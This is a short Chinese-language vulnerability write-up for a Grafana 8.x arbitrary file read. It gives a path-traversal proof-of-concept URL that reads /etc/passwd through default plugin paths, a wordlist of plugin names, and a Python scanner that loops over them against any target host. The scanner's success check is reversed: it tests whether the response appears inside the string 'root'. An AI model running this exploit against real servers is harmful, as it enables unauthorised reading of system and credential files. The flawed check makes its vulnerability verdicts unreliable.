Grafana任意文件读取
漏洞描述
Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件
影响版本
Grafana 8.x
漏洞复现
POC
HTTP://XXX.XXX.XXX.XXX/public/plugins/插件名称/../../../../../../../../../etc/passwd
paload.txt
alertmanager
grafana
loki
postgres
grafana-azure-monitor-datasource
mixed
prometheus
cloudwatch
graphite
mssql
tempo
dashboard
influxdb
mysql
testdata
elasticsearch
jaeger
opentsdb
zipkin
alertGroups
bargauge
debug
graph
live
piechart
status-history
timeseries
alertlist
candlestick
gauge
heatmap
logs
pluginlist
table
welcome
annolist
canvas
geomap
histogram
news
stat
table-old
xychart
barchart
dashlist
gettingstarted
icon
nodeGraph
state-timeline
text
检测脚本
import requests
import sys
args = str(sys.argv[1])
f = open("./paload.txt")
for line in f:
url = "http://"+args+"/public/plugins/"+str.rstrip(line)+"/../../../../../../../../../../../etc/passwd"
headers = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
}
req = requests.post(url, headers=headers,timeout=(3,7),allow_redirects=False)
a=req.text
str1='root'
if a in str1:
print('确认存在'+str.rstrip(line)+'路径,并存在漏洞!')
print(url)
else:
print('不存在漏洞!')